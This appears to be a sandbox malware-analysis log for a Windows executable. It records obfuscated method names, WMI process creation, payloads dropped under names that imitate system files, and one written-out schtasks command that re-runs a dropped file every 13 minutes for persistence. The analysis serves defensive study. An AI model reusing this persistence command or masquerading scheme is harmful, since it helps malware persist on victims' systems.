Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, gcsNgs8gW5YhABHPifD.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'NeWm5Zgf0w', 'shU9GM8IKr', 'kFomBa8KFd', 'GudfQJSGEF3CsiOGBXA', 'exVhIQSQfnsymUpx8q5', 'Ss5uOpSoPEFUi1XaCNt', 'osqgTVSYV7DFuGUt4li', 'fwYrPpSZoNuIpMgTuRB'
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, KurYUU8DqecnUkbsymC.cs	High entropy of concatenated method names: 'bxcEno1VLf', 'rNTEFd5V43', 'nnoEWGJgHV', 'c0qEgOJcwc', 'ykZo0ZMlVlSR8Lu15ZT', 'HodExkMEFujFinSAA1r', 'RKOc5UMVT99tUfrQjBp', 'WvPCU1MNj9NeXhfUBuQ', 'nXKF1aMixFxI4JGYWXu', 'snbECrMTLtDARFmTpyl'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File created: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Jump to dropped file
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File created: C:\PortsavesPerfdhcpsvc\upfc.exe	Jump to dropped file
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File created: C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe	Jump to dropped file
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	File created: C:\Recovery\sihost.exe	Jump to dropped file
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	File created: C:\Users\user\AppData\Local\Temp\3eb93d73da02516de53e5ed168763ffb45d30163.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	File created: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /f

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\sihost.exe	Process information set: NOOPENFILEERRORBOX
